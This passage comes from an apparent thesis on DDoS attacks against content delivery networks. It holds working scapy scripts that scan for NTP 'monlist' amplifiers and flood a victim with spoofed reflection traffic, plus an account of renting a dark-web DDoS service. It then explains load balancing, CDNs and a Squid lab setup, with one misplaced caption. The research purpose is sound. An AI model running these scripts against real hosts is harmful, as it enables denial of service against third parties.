As for personal host with limited bandwidth, even set much higher scanning rate, the final
result would not be changed or even worse, because if the speed was too fast, then a lot of
hosts would be missed. Usually, according to the description of masscan invention group,
scanning the entire network with one port should cost about 10 hours with max speed. In
figure 5.34 the practical max­speed of scanning was limited by the user bandwidth and no
results were found. To get over 2 million packets per second, users have to get an Intel
10­gbps Ethernet adapter and a specific driver known as “PF_RING ZC”.
Figure 5.34: Port scanning rate of Masscan
In figure 5.35 the number of active NTP servers all over the world were shown.
68
Analysis of DDoS attacks against content delivery networks
==PAGE:77==
Figure 5.35: Distribution of global NTP servers
Even already scanned all hosts which opened UDP port 123, whether target hosts were
running NTP services was not sure. Thus, raw data of “monlist” request should be con­
structed and tested to check if servers will return data. A lot of NTP servers may have
filtering mechanism, for example, filter for UDP packets 50 bytes in size with the payload
1
\x17\x00\x03\x2a"."\x00"x4
So construct a raw data as long as the request is over 80 bytes. However, that depends
on concrete cases but with similar idea.
1
rawData = "\x17\x00\x03\x2a" + "\x00" * 80
Then all returned data should be monitored, define a function called “detect” which aimed
to monitor UDP data on a specific port, the selected port should be the source port sending
“monlist” request as well. Any NTP server responded will be mapped to the selected
port. Usually, select port with large number which is not used commonly. The destination
network address should be the attacker’s IP.
1
def detect():
2
DetectedResult = sniff(filter”=udp port 50001 and dst net ”47.92.137.85,
store=0, prn=filerer)
As long as NTP servers respond to the “monlist” requests, the replied data will be caught
by detect(), detect() will put all received data into filterer function to handle. “filterer” will
check caught data packets if their size are bigger than 200 bytes. This is because when
NTP servers responded “monlist” requests, the returned packages would be larger. 200
was set as a threshold to filter unrecognized packages. Complete codes of scan NTP
servers was shown in listing listing 5.13:
Analysis of DDoS attacks against content delivery networks
69
==PAGE:78==
1
2
from scapy.all import *
3
import thread
4
5
rawData = "\x17\x00\x03\x2a" + "\x00" * 80
6
7
Inputfile = open('ntp.txt', 'r')
8
9
OutputFile = open('NTPServers.txt', 'a')
10
def detect():
11
12
DetectedResult = sniff(filter="udp port 50001 and dst net 47.92.137.85",
store=0, prn=filterer)
13
def filterer(packet):
14
15
if len(packet) > 200:
16
if packet.haslayer(IP):
17
print packet.getlayer(IP).src
18
19
OutputFile.write(packet.getlayer(IP).src + '\n')
20
thread.start_new_thread(detect, ())
21
22
for address in Inputfile:
23
send(IP(dst=address)/UDP(sport=50001, dport=123)/Raw(load=rawData))
24
print 'End'
Listing 5.13: script filtering scanned results to get NTP server lists
The second step is to conduct NTP DDoS attack by using the collected and filtered IP
addresses of NTP servers. Listings can conduct attack based on NTP version 2. It aims
to scan all old NTP servers which still opened port 123 and utilize them to conduct attack,
but most of the current NTP server were updated to NTP version 4 which closed UDP
port 123 in default. SO according the statistic, the successful ratio of UDP amplification
DDoS attack is 30 percent. Figure 5.36 showed the result of forged packets sent to the
victim. However, due to it is hard to find out the old NTP servers and consider the time
limit. Scripts were not able to cause damage to hosts. More details were showed in video
with link ”https://www.youtube.com/watch?v=cRXGIWcHX0g&feature=youtu.be”.
70
Analysis of DDoS attacks against content delivery networks
==PAGE:79==
Figure 5.36: Data packets of NTP service
Listing listing 5.14 was the source code of the attacking script by keep sending faked NTP
data packets.
1
2
from scapy.all import *
3
import random
4
import time
5
import sys
6
import threading
7
8
def attack():
9
global NTPServer
10
global ntpserver
11
global rawData
12
global target
13
NTP = NTPServer[ntpserver] #store NTP server IP addresses
14
ntpserver = ntpserver + 1 #traverse
15
packet = IP(dst=NTP,src=target)/UDP(sport=random.randint(50000,65500),dport
=123)/Raw(load=rawData) #construct trash data
16
send(packet,loop=1)
17
18
def info():
19
print "NTP Amplification reflection DDoS Attack"
20
print "made by Zihao Li"
21
exit(0)
22
23
try:
24
if len(sys.argv) < 4:
25
info()
Analysis of DDoS attacks against content delivery networks
71
==PAGE:80==
26
# define parameters of input
27
target = sys.argv[1] #target hosts or servers
28
29
NTPImported = sys.argv[2] #NTP server list achieved before
30
definedThreads = int(sys.argv[3]) #define parallel threads
31
NTPServer = []
32
ntpserver = 0
33
with open(NTPImported) as f:
34
NTPServer = f.readlines()
35
36
if
definedThreads > int(len(NTPServer)):
37
print "Threads defined should not be more than the number of NTP servers"
38
exit(0)
39
40
rawData = "\x17\x00\x03\x2a" + "\x00" * 80
41
threads = []
42
43
print "begin to attack: "+ target + " scan NTP server lists: " + NTPImported
+ " enable " + str(definedThreads) + " threads"
44
print "CTRL+C to stop"
45
46
for n in range(definedThreads):
47
thread = threading.Thread(target=attack)
48
thread.daemon = True
49
thread.start()
50
threads.append(thread)
51
52
print "attacking..."
53
54
while True:
55
time.sleep(1)
56
except KeyboardInterrupt:
57
print("attack stopped.. Shutting down")
Listing 5.14: NTP DDoS attack script
Figure 5.37 showed the process of conducting DDoS by the script.
Figure 5.37: Attacking process of NTP DDoS script
The second tool is a hacker class DDoS tool can generate DDoS traffic of 300G or even
1 T. However, only API was provided in a dark web chatting group. It combines both TCP
and UDP DDoS attack techniques. Figure 5.38 showed the result of servers crashed down
and figure 5.39 warning information provided by cloud service management platform.
72
Analysis of DDoS attacks against content delivery networks
==PAGE:81==
Figure 5.38: Attacking process of hacker­class DDoS API
Figure 5.39: Data cleaning service provided by Alicloud
Figure 5.40 showed the CPU using rate of target server and figure 5.41 showed the final
result server crashed down because of resource exhausted. According to the protection
mechanism of Alicloud, all servers crashed under DDoS will be cut down all open ports
and set in black hole state for a specific time period.
Figure 5.40: CPU using rate of target server
Analysis of DDoS attacks against content delivery networks
73
==PAGE:82==
Figure 5.41: Crashed server set in black hole state
74
Analysis of DDoS attacks against content delivery networks
==PAGE:83==
6
Deployment of CDN edge nodes and
risk analysis on CDN
As chapter 4 mentioned, CDN aims to deploy cache server clusters for load balancing.
Load balancing and CDN can not be separated. So in this chapter, Load balancing and
CDN principles will be explained in detail. To understand better on Virtual IP address
applied in following techniques, a comparison of various types of IP address need to be
explained.
6.1
Dynamic IP, static IP, public IP, private IP and Virtual IP
To have a better understanding of IP address, dynamic IP, static IP, public IP, private IP
and virtual IP are all listed [adm20]. In the world of network, to recognize the position of
each computer, real IP addresses are required. For example, google.com with public IP
address 216.58.207.206. However, it is well known that IP address is only xxx.xxx.xxx.xxx
where xxx is an integer between 1 and 255, due to the recent growth of number of comput­
ers, the physical IP has been insufficient gold. So private IP address has been reserved
for the use in the intranet domain. The three reserved IP network segments are shown in
table 6.1:
RFC1918 name
IP address range
Classful description
24­bit block
10.0.0.0 – 10.255.255.255
single class A network
20­bit block
172.16.0.0 – 172.31.255.255
16 contiguous class B networks
16­bit block
192.168.0.0 – 192.168.255.255
256 contiguous class C networks
Table 6.1: Private IPv4 address
There are limits on private IP:
1. Routing information for private addresses can not be disseminated.
2. Packets that use a private address as a source or destination address can not be
forwarded over the internet
3. References to private addresses, such as DNS, are limited to internal network use
As mentioned in previous chapters, private IP and public IP can be translated by NAT.
As for dynamic IP and static IP, basically, these two things are the products of the recent
growth of internet companies. For example, if a network company wants to apply for a
dedicated ADSL(Asymmetric digital subscriber line), the telecom operator will provide a
static physical IP address which is called static IP. However, if apply time­rate ADSL sys­
tem, the physical IP can be used by dozens of people, so servers’ IP is dynamic which is
called “dynamic IP” or “floating IP”. Most devices use dynamic IP addresses, which are
assigned by the network when they connect and change over time. Most users do not use
static IP unless when external devices or websites need to remember specific IP address
like VPN.
Analysis of DDoS attacks against content delivery networks
75
==PAGE:84==
Virtual IP address is an IP address does not correspond to an actual physical network
interface, a particular computer or a particular network card. All packets sent to this IP
addresses will eventually pass through the real network card to the destination host. A
common use case of virtual IP is the application in the aspect of “High availability”. Usu­
ally, a system could crash down due to routing maintenance or unplanned situations. In
order to improve the high availability of external services of the system, the configura­
tion will adopt the active/standby mode. When the host A providing services experiences
down­time, services will be switched to the standby host S to continue to provide services.
In this case, the IP address provided by the system to clients will be a virtual IP. When
host A is down, virtual IP will float to the standby machine and clients will not notice that
changes. So in this case, the virtual IP does not correspond to a particular computing
host or network card, it is the concept of logic which can float or move freely. Thus virtual
IP blocks the details of internal system and provides a convenient maintainability.
In the way of implementing HA, two machines are generally used to complete a function
at the same time, such as database server. Usually, only one machine provides exter­
nal services and the other one acts as a hot standby. The way to detect fault in hosts
is heartbeat detection which send packets to each machine to indicate that they are still
alive. Implementation of virtual IP is based on ARP(address resolution protocol) protocol.
Because IP address is a logic address, MAC address is the real physical address of data
transmission in Ethernet. Each host has an ARP cache table, which stores the corre­
sponding relationship between IP address and MAC address in the same network. When
the host in Ethernet sends data, it will first query the MAC address corresponding to the
target IP from this cache table and send data to this MAC address. The operating system
maintains this cache automatically. It is the key to the whole implementation. Here is an
example, the original ARP cache is shown below:
1
(192.168.1.219) at 00:21:5A:DB:68:E8 [ether] on bond0
2
(192.168.1.217) at 00:21:5A:DB:68:E8 [ether] on bond0
3
(192.168.1.218) at 00:21:5A:DB:7F:C2 [ether] on bond0
Two real hosts with IP addresses 192.168.1.217 and 192.168.1.218, Host provides database
services with IP address 192.168.1.217, Standby machine with 192.168.1.218, Virtual IP
address is 192.168.1.219. IP address 192.168.1.219 and IP address 192.168.1.217 tar­
get at the same MAC address which means virtual IP address is an temporary IP address
to the external network. Then host with IP 192.168.1.217 crashed down. The ARP cache
table changed.
1
(192.168.1.219) at 00:21:5A:DB:7F:C2 [ether] on bond0
2
(192.168.1.217) at 00:21:5A:DB:68:E8 [ether] on bond0
3
(192.168.1.218) at 00:21:5A:DB:7F:C2 [ether] on bond0 
When host with IP 192.168.1.218 detected original working host is down, it will send a ARP
data packet to tell all hosts now 192.168.1.219 corresponds to its own MAC address.
6.2
Linux vitual server­load balancing
In order to meet the demand of highly scalable and highly available network services,
Linux virtual server was proposed which is a solution of load balancing scheduling based
on IP layer and content request distribution.
76
Analysis of DDoS attacks against content delivery networks
==PAGE:85==
The architecture of a virtual server is shown in figure 6.1, with a group of servers con­
nected to each other over a high­speed LAN or geographically distributed WAN with a
Load balancer at the front­end. The load balancer can seamlessly schedule network re­
quests to real servers, thus making the structure of the server transparent to customers,
who access the network services provided by the cluster system as if they were visiting a
high­performance, highly available server. The client is not affected by the server cluster
and does not need to make any changes. System scalability is achieved by transparently
adding and removing a node in the service cluster. Since the load balancing technology
is implemented in the Linux kernel, so it is called Linux virtual server [ZZ03].
Figure 6.1: Structure of Linux virtual server
Figure 6.2 showed the common set positions in the deployment of network.
Analysis of DDoS attacks against content delivery networks
77
==PAGE:86==
Figure 6.2: Deployment of LVS in network
Currently, LVS program has already provided a framework which contains IP load bal­
ancing technology, IPVS(IP virtual server software), kernel layer­7 switch KTCPVS and
cluster management software based on content request distribution. LVS framework can
be used to implement highly scalable, highly available network services such as Web,
Cache, Mail and Media. It can be used to develop E­commerce applications which sup­
port a large number of users.
6.2.1
IP virtual Server
Among the existing IP load balancing technologies, a set of servers is formed into a high­
performance and high available virtual server through Network address Translation, which
is called VS/NAT(Virtual Server via Network Address Translation).
Most commercial­
ized IP load balancing schedulers use this method like Cisco LocalDirector, F5’s Big/IP,
and Alteon’s ACEDirector. IPVS applies (VS/TUN)Virtual Server through IP tunnel and
VS/DR(Virtual Server via Direct Routing) to improve the scalability of the system. The
general principles of these three virtual server technologies are shown below:
VS/NAT: Through network address translation, the load balancer rewrites the target ad­
dress of the request packets, and dispatches the request to the real server at the back
end according to the preset scheduling algorithm like Round Robin, Least Connection,
Locality­Based Least Connections, etc(in this article, those algorithms will not be ex­
plained). When the response message of the real server passes through the load bal­
ancer, the source address of the message is rewritten and returned to the customer,
completing the whole load balancing process. Figure 6.3 showed the working model.
78
Analysis of DDoS attacks against content delivery networks
==PAGE:87==
Figure 6.3: Virtual Server via NAT
VS/TUN: With NAT, the load balancer’s capacity becomes a bottleneck as both request
and response packets must be rewritten by the schedule address. To solve this prob­
lem, the load balancer forwards the request message through the IP tunnel to the real
server, which returns the response directly to the customer, so the load balancer only
processes the request message. IP tunneling is the technique of wrapping one message
within another IP address so that each of the packets targeted to one IP address can
be encapsulated and forwarded to the other IP address. Since the general network ser­
vice response is much larger than the request message, the maximum throughput of the
cluster system can be increased by 10 times by using VS/TUN. Figure 6.4 showed the
working flowchart of VS/TUN.
Analysis of DDoS attacks against content delivery networks
79
==PAGE:88==
Figure 6.4: Virtual Server via IP Tunneling
It has the same connection scheduling and management as VS/NAT, except that it has
a different way to forward messages. The load balancer dynamically selects a server
according to the load of each server, encapsulates the request message in another IP
address, and then forwards the encapsulated IP message to the selected server. After
receiving the packet, the server unpacks the packet to get the packet with the original des­
tination address of VIP. The server finds that the VIP address has be configured on the
local IP tunnel equipment, so it processes the request and sends the response message
directly back to the customer according to the routing table. The destination address of
the request message is VIP, and the source address of the response message must also
be VIP. Therefore, the response message does not need to be modified and can be di­
rectly returned to the customer, who thinks it can receive normal service without knowing
which server is handling it.
VS/DR: By rewriting the MAC address of the request packet, VS/DR sends the request to
the real server, which returns the response directly to the customer. It is similar to VS/­
TUN technique, the VS/DR technique can greatly improve the scalability of a clustered
system. This approach does not have the overhead of IP tunneling, nor does it require
the real server in the cluster to support IP tunneling protocol, but requires that both the
load balancer and the real server has a network card connected to the same physical
network segment. The structure of VS/DR is shown in figure 6.5. Both the load balancer
and server group must physically have a network card connected via an LAN, such as
via a high­speed switch or HUB. The VIP address is shared between the load balancer
and the server group. The VIP address configured by the load balancer is visible to the
external network and is used to receive the request message of the virtual services. All
servers have their VIP addresses configured on their network devices, which are used to
handle network requests with VIP addresses.
80
Analysis of DDoS attacks against content delivery networks
==PAGE:89==
Figure 6.5: Virtual Server via Direct Routing
The working flowchart of VS/DR was shown in figure 6.6: messages are directly routed to
the destination server. In VS/DR, the load balancer dynamically selects a server according
to the load of each server and does not modify or encapsulate IP message. Instead, it
changes the MAC address of the data frame to the MAC address of the selected server
and then sends the modified data frame on the LAN with the server group. Because the
MAC address of the data frame is the selected server, the server can definitely receive the
data frame and get the IP packet from it. When the server discovers that the destination
address of the packet VIP is on a local network device, the server processes the packet
and sends the response packet directly back to the customer based on the routing table.
Analysis of DDoS attacks against content delivery networks
81
==PAGE:90==
Figure 6.6: Working flowchart of VS/DR [ZZ03]
6.3
Load balancing architecture
Before stating load balancing, two key techniques should be introduced: Virtual Router
Redundancy Protocol and keepalived mechanism.
6.3.1
Virtual Router Redundancy Protocol(VRRP)
VRRP organizes a set of LAN routers(including a master active router and several backup
routers) into a virtual router, called a backup group [yil15]. The virtual router has its own IP
address for example 10.1.1.1(this IP can be the same as the interface address of a router
in the backup group, which is called the IP owner), and the router in the backup has its
own IP address. Master’s IP is 10.1.1.2, backup’s IP is 10.1.1.3. The host in the LAN only
knows the IP address of the virtual router 10.1.1.1, but does not know the IP address of
specific master router 10.1.1.2 and backup router 10.1.1.3. They set their default routing
next­hop address to the virtual router’s IP address of 10.1.1.1. The host in the network
then communicates with other networks through virtual router. If master router in the
backup group is down, the backup router will use election policy to select a new master
router and continue to provide routing services to hosts within the network. Thus, the host
computer in the network can communicate with the external network without interruption.
Its finite state machines were shown in figure 6.7.
82
Analysis of DDoS attacks against content delivery networks
==PAGE:91==
Figure 6.7: State machine of VRRP
When all nodes start, to reach the state transition, at the beginning, the initial states of
nodes are all backup. Then nodes send messages to the other, as well as their priority
information. Node with highest priority becomes master node and provides service for
customers. If the node is down, its state will be changed to backup due to the reduced
priority. The other node will turn into master node and be activated. VIP and VMAC will
be transferred to this node to provide services.
6.3.2
keepalived
Keepalived implements a set of checkers to dynamically and adaptively maintain and
manage load balanced server pool according to their health [Li06b]. On the other hand,
high­availability is achieved by the VRRP(Virtual Router Redundancy Protocol). So its
basic principle is similar to the active/standby working mode.It was designed for IPVS,
keepalived can call IPVSadm commands to generate rules after real servers at the back­
end can not receive information from the active node. This can be automatically imple­
mented by “taking over” the active VIP and IPVS rules and applying them to the standby
node to continue serving customers. When keepalived is started on one node, it produces
a master process, which in turn to produces two sub processes, VRRP stack(which im­
plements VRRP protocol) and checkers(which checks the health of IPVS back­end real
servers).
6.3.3
Concrete load balancing architecture
This article focuses on the layer 4 load balancing rather than layer 7. Layer 4 load bal­
ancing can apply open­source software LVS + keepalived to implement load balancing
[Ali19]. As figure shown in figure 6.8. LayerLayer 4 load balancing is actually run by de­
ploying multiple LVS machines into a single LVS cluster. The cluster deployment mode
greatly ensures the availability, stability and scalability of load balancing services under
unplanned conditions. Each LVS in the LVS cluster will have a session, and the group
broadcast text will be synchronized to other LVS machines in the cluster, so as to achieve
session synchronization between each machine in the cluster.
Analysis of DDoS attacks against content delivery networks
83
==PAGE:92==
Figure 6.8: Load balancing architecture of Alicloud [Ali19]
As figure 6.9 shown below, when the client transmits three packets to the server, session
A established on LVS1 starts to synchronize to other LVS machines. When LVS1 fails
or is under maintenance, traffic will go to LVS2 which can run normally. Load balancing
is most transparent to clients in case of machine failure and cluster maintenance without
affecting user business. So typically, multiple load balancing clusters can be deployed in
different areas in the same city or in different cities to improve disaster recovery ability.
Figure 6.9: Working principle of load balancing
84
Analysis of DDoS attacks against content delivery networks
==PAGE:93==
6.4
Current situation of CDN and analysis of CDN working
principle
Content delivery Network is distributed network which is composed of server clusters dis­
tributed in different regions. CDN can share the traffic pressure of origin servers, avoid
network congestion, provide service acceleration and improve the respond speed of ori­
gin servers. There are large amount of successful cases currently.
Dedicated B2C(business to consumer) platform e­commerce websites like Amazon, Tmall,
Taobao relying on the distributed system architecture of CDN significantly reduced the
business bandwidth and operating expense. When facing special shopping festivals like
black Friday, traffic and bandwidth is a huge challenge without CDN. As for social net­
work web applications like Facebook, Wechat, etc, mass images of users require to be
processed in seconds. If speed of image loading can not be improved, user experience
could be decreased sharply. Video websites or live streaming platforms need CDN to
create superhighways so reduce time costs from origin to end users. CDN minimizes
buffering and delays through superhighways by sending streams to audiences across the
global servers.
Before stating the basic working principle, specific terminologies should be explained.
1. Accelerated Domain name: Accelerated domain name is the domain name which
users want to provide CDN acceleration for. It could be a set of server addresses such
as web server, mail server, FTP server, etc. Which domain names should be selected as
accelerated domain names depends on the working load of different servers.
2. CNAME record: Canonical name record. A type of resource record in DNS, it is used
to resolve one domain name to another domain name, and the other domain name should
provide the IP address. For example, if one server stores mass documents, which can
be accessed by “doc.test.com”. However, developers hope users can access the server
by another domain name “docs.test.com” as well. Then web developers can add one
CNAME record to the DNS resolution service provider to make “docs.test.com” pointed to
“doc.test.com”. After adding the new entry, all requests to “docs.test.com” will be trans­
ferred to “doc.test.com” and users access to the domain name will get the same contents.
3. CNAME domain name: To make a better understanding of CNAME domain name, it is
necessary to make a comparison among CNAME, URL forwarding and A record domain
name. A record means address record, it directly points domain name to IP address. If IP
address of host does not change very often, it is suggested that add A record to the DNS
service provider. CNAME is more flexible, which can point all registered domain names
to only one main domain name. CNAME record settings can be a description of domain
names rather than IP address. As for URL forwarding, it can forward requests access­
ing one domain name to a directory or even a file of another domain name but CNAME
can not make it. That is the main difference. To make it clear, examples like, when add
CNAME record “A.test.com” to “B.test.com”. “B.test.com” will automatically resolve itself
to the same IP address with “A.test.com”. So when visiting “A.test.com/index.php” and
“B.test.com/index.php”, both show the same result. When add URL forwarding, requests
to “A.test.com” will be forwarded to “B.test.com”, a totally different website. Some DNS
providers would have settings of host names rather than DNS records. Basically, host
names setting aims to provide domain name resolution by another DNS service providers.
DNS records usually means the default DNS service provider will offer DNS service. So
Analysis of DDoS attacks against content delivery networks
85
==PAGE:94==
users only need to add entries in the records table.
4. Edge node: edge node, CDN node, Cache node, acceleration node, etc, all refer
to one thing. Edge node is a concept proposed relative to the complex structure of the
network. It refers to the network node with fewer intermediate hops between the access
users and itself and has better response ability and connection speed for the end users
compared with the origin servers. Its function is to cache the content with heavy traffic to
the edge server, so as to improve the speed and quality of the network.
The basic working principle of current enterprise CDN network was shown in figure 6.10
below.
Figure 6.10: Working principle of CDN
Supposing the target accelerated domain name is “www.test.com”, when it is deployed in
CDN network and provided with acceleration services, then an terminal user sends HTTP
requests. The whole process can be divided into 7 steps:
• User sends requests access to required resources, firstly, user host has to ask local
DNS servers to conduct domain name resolution for “www.test.com” and wants to
get its corresponding IP address.
• Local DNS servers check their cache if they have IP address records of “www.test.com”.
If entries exist, then queried results will be returned to users directly. If not, requests
will be forwarded to authoritative DNS servers.
• Authoritative DNS servers resolve “www.test.com” and return the IP address of
86
Analysis of DDoS attacks against content delivery networks
==PAGE:95==
CNAME record of “www.cdntest.com”. Here CNAME record means that all CNAME
domain names are mapped to the IP addresses of edge nodes in CDN network.
• When DNS requests sent to the enterprise scheduling system, the system will assign
best edge node for the CNAME domain name and provide the corresponding IP
address of the selected edge node, for example, 2.2.2.2 for city A. 8.8.8.8 for city B.
• Local DNS servers obtain the returned IP address of CNAME domain name 2.2.2.2.
• User obtain the IP address
• User send requests to the IP address.
If the edge node has already cached resources required by user, then it will directly send
data to user, otherwise, edge node will send resource requests to the origin servers. After
getting returned contents, it will automatically cache the received contents and send them
back to users.
Normally, there are limits for single client because most of those companies which pro­
vide CDN acceleration services rule that for domain names, each client can speed up at
most 50 domain names, bandwidth of domain names higher than 50Mbps can be added
in additional domain name lists. For origin servers, each accelerated domain name can
have at most 10 origin servers which mean 10 IP addresses. For cache, URL refreshing
can be 2000 entries at most.
6.4.1
Cache server
Cache servers means storage devices which can read or write data faster, the intention
of cache servers are to cache data in the places which are close to users or applications.
Cache servers have 4 types: CDN cache, reverse cache, distributed cache and local
cache [che20].
As mentioned above, basic principle of CDN is to apply various types of cache servers and
distribute them in the region or network with relatively centralized user access. When the
user visits the website, the global load technology is used to redirect user access to the
nearest cache server which works normally, and the cache server responds to the user’s
request directly. Cache servers mainly store static resource files like webpages, scripts,
images, videos, files, etc. Global network situation is highly complex, cross­operator net­
work access would be slow. To solve the problem of global user accessing the websites.
Mature companies will deploy CDN edge nodes in important cities to reduce network traf­
fic congestion.
At present, small and medium­sized internet companies generally rent third­party CDN
services based on the comprehensive cost considerations, while large internet compa­
nies adopt self­built CDN or combination of third­party and self­built CDN strategy. For
example, Taobao as a famous Chinese E­commerce platform applied third­party CDN
services at the beginning. However, those services were unable to support CDN traffic
when it becomes too huge. Finally, Taobao deployed its own CDN. The topology of CDN
was shown in figure 6.11.
Analysis of DDoS attacks against content delivery networks
87
==PAGE:96==
Figure 6.11: CDN architecture of Taobao
About practical deployment of cache servers, common used middlewares are like Ngnix,
Squid, Memcache, Redis, etc. The caching strategy contains expiration strategy and
synchronization strategy. Expiration strategy defines rules like data can be cached for
fixed 30 minutes or if data not accessed within the latest 10 minutes would be removed
from cache servers. Synchronization strategy requires live caching and asynchronous
updating.
6.4.2
Forward proxy and reserve proxy
Normally, proxy can be divided into forward proxy, reverse proxy and transparent proxy
[XX18]. Transparent proxy is a server locates between person hosts and the internet and
redirects requests without modifying them. Forward proxy is used to retrieve data from
external network. For example, if users want to access “www.google.com” which was un­
available, then users can make forward proxy server which can access “www.google.com”
forward the requests.
The difference between forward proxy and reverse proxy was
shown in figure 6.12 and figure 6.13.
88
Analysis of DDoS attacks against content delivery networks
==PAGE:97==
Figure 6.12: Forward proxy
Figure 6.13: Reverse proxy
Reverse proxy technique is the most significant part of CDN technique. Reverse proxy
servers are located in the application server room and handle all requests to the Web
server. If the page requested by the user is cached on the proxy server, the proxy server
sends the cached contents directly to the user. If there is no buffer, the request is made
to the origin server. As long as data is retrieved, local cache will be sent to the user. Most
frequently used proxy are Squid and Nginx which are free open­source proxy. Squid
has complete functions and is suitable for all kinds of static file caching. Nginx applied
third­party “ncache” module for buffering, usually it is used as reverse proxy to implement
Analysis of DDoS attacks against content delivery networks
89
==PAGE:98==
simple caching.
Reverse proxy mainly caches static resources and dynamic resources will be forwarded to
the application servers. Take Squid as an example, Squid reverse proxy caches contents
according to the HTTP header returned from web servers. Four most important header
flags are ”Last −modified” which tells reverse proxy when to be updated, ”Expires”
which tells proxy when web pages should be deleted from buffer, ”Cache−control” which
tells proxy whether current web pages should be cached and ”pragma” which is used to
implement specific instructions.
6.4.3
Deployment strategy of Squid
In this article, CDN network was deployed based on Squid. Squid is a high­performance
proxy caching server that supports FTP, HTTPS and HTTP protocols. Unlike normal proxy
caching software, Squid uses a separate, non­modular, I/O­driven process to handle all
client requests. Figure 6.14 showed the workflow of Squid proxy server.
Figure 6.14: Workflow of Squid proxy server
When proxy server has data requested by clients:
1. clients send data requests to proxy server
2. Proxy server checks its own data cache.
3. Proxy server finds out the wanted data and pull data from cache.
4. Proxy server sends data back to the clients
When proxy server does not have data requested by clients:
1.Clients send data requests to proxy server
2.Proxy server checks its own data cache.
3.Proxy fails to find out the wanted data resources.
90
Analysis of DDoS attacks against content delivery networks
==PAGE:99==
4.Proxy server send data requests to the origin server
5.Origin server replies and returns corresponding data, Proxy server get returned data
, send them to clients and keep one backup in data cache.
Squid consists of 5 parts, main program(/squid/sbin/squid), main configuration file(squid.conf),
port listening TCP(80), default access logs(/squid/var/logs) and cache(/squid/var/cache).
Only enough edge nodes were deployed in CDN network can defend strong DDOS attack.
In this case, multiple Squid connected together forming a hierarchy of caches. Hierarchies
are built of two basic peering linkages. Figure 6.15 showed parent links and sibling links.
The two basic connections can be combined into various types of complex hierarchies
like Taobao’ s CDN network shown before.
Figure 6.15: Basic connection hierarchies of Squid
6.5
Lab4: Deployment of CDN edge node
A simplified version of CDN network was deployed on ECS in VPC, environment is listed
as below:
• Windows Server 2008(47.92.137.85) as origin server
• Windows Server 2008(47.92.116.106) as CDN edge node
• Squid
• Godaddy DNS service provider
The simplified version can be seen as one of the edge nodes in the whole CND network,
all edge nodes are in the sibling hierarchy which means all edge nodes are the same for
origin servers. Nothing needs to be deployed on origin servers. After downloading Squid
on edge node server, configuration of Squid forwarding requests should be set. Squid
should be given the IP address of origin servers and the accelerated domain name. Most
companies they would prefer not to make Squid directly connected with origin servers with
“never_directallowall” directive, because it is dangerous to make public real IP address
of origin servers exposed. Instead, Squid will be given a parent cache as the forwarding
destination. In this lab, there were not enough servers to be deployed, so in order to clar­
ify the working principle and make it convenient to conduct next DDOS attack, edge node
Analysis of DDoS attacks against content delivery networks
91
==PAGE:100==
can directly forward requests to origin servers.
The most important configuration on Squid is about network options in the configuration
file mentioned before, the listing listing 6.1 shows the concrete settings.
Listing listing 5.14 was the source code of the attacking script by keep sending faked NTP
data packets.
1
2
# NETWORK OPTIONS
3
# ---------------------------------------------------------------------------
4
5
http_port 80 accel vhost vport
6
7
# enable acceleration reverse proxy mode with virtual hosts and virtual ports
8
9
# ---------------------------------------------------------------------------
10
11
cache_peer 47.92.137.85 parent 80 0 no-query originserver weight=1 name=server
12
13
#back-end server with defined IP, parent means catch parent Squid server(
sibling catch peer Squid servers), 80 as back-end port, 0 means whether
apply ICP(internet cache protocol) port to find out most appropriate
location to retrieve a request when there are multiple caches used, weight
set as 1, give name for the cache peer
14
15
cache_peer_domain server www.lzhzzzs.xyz
16
17
#define accelerated domain name
18
19
# ---------------------------------------------------------------------------
20
hierarchy_stoplist cgi-bin ?
21
22
#define words in URL to not query neighbor caches for those objects , for
example , after ? \.asp \.php \.jsp \.cgi
23
24
acl QUERY urlpath_regex cgi-bin \?
25
26
#define words in URL, when dynamic requests came, string after “”?is the
arguments for an query which should not be cached.
27
28
collapsed_forwarding on
29
30
#when enabled , Squid just sends the first concurrent request when there are
many requests are for the same URL.
31
32
33
# ---------------------------------------------------------------------------
34
35
cache_mem 3024 MB
36
cache_swap_low 90
37
cache_swap_high 95
38
maximum_object_size 10 MB
39
minimum_object_size 1 KB
40
41
#define options which affect cache size
42
43
# ---------------------------------------------------------------------------
44
45
cache_replacement_policy heap GDSF
46
memory_replacement_policy heap GDSF
47
92
Analysis of DDoS attacks against content delivery networks
==PAGE:101==
48
# set replacement policy for small files
49
50
# ---------------------------------------------------------------------------
51
cache_dir aufs C:/Squid/var/cache 20000 16 256
52
access_log C:/Squid/var/logs/access.log squid
53
cache_log C:/Squid/var/logs/cache.log
54
cache_store_log C:/Squid/var/logs/store.log
55
56
# define directories of logs and cache
57
58
# ---------------------------------------------------------------------------
59
60
refresh_pattern ^ftp:
1440
20% 10080
61
refresh_pattern ^gopher:
1440
0%
1440
62
refresh_pattern -i (/cgi-bin/|\?) 0 0%
0
63
refresh_pattern -i \.jpg$ 1180 20% 2880 override -expire ignore -reload
64
refresh_pattern -i \.png$ 1180 20% 2880 override -expire ignore -reload
65
refresh_pattern -i \.gif$ 1180 20% 2880 override -expire ignore -reload
66
refresh_pattern -i \.bmp$ 1180 20% 2880 override -expire ignore -reload
67
refresh_pattern -i \.js$ 1180 20% 2880 override -expire ignore -reload
68
refresh_pattern -i \.swf$ 1180 20% 2880 override -expire ignore -reload
69
refresh_pattern -i \.html$ 1180 20% 2880 override -expire ignore -reload
70
refresh_pattern -i \.htm$ 1180 20% 2880 override -expire ignore -reload
71
refresh_pattern . 0 20% 4320
72
73
74
range_offset_limit 0 KB
75
quick_abort_min 16 MB
76
quick_abort_max 16 MB
77
quick_abort_pct 95
78
79
# define the updating rate of specific files, the higher percentage is, the
lower the updating rate is, for example , define .flv files which do not
need to be updated often as 50%, percentage means time.
80
81
# ---------------------------------------------------------------------------
82
request_entities off
83
coredump_dir C:/Squid/var/cache
84
cache_mgr lizihao@qq.com
85
via off
86
httpd_suppress_version_string off
87
visible_hostname lizihao.com
88
89
#define information of deployer when error pages displayed
90
91
# ---------------------------------------------------------------------------
92
93
acl all src all
94
acl manager proto cache_object
95
acl localhost src 127.0.0.1/32
96
acl to_localhost dst 127.0.0.0/8
97
98
acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
99
acl localnet src 172.16.0.0/12
# RFC1918 possible internal network
100
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
101
102
103
acl SSL_ports port 443
104
acl Safe_ports port 80
# http
105
acl Safe_ports port 21
# ftp
106
acl Safe_ports port 443
# https
107
acl Safe_ports port 70
# gopher
Analysis of DDoS attacks against content delivery networks
93
==PAGE:102==
108
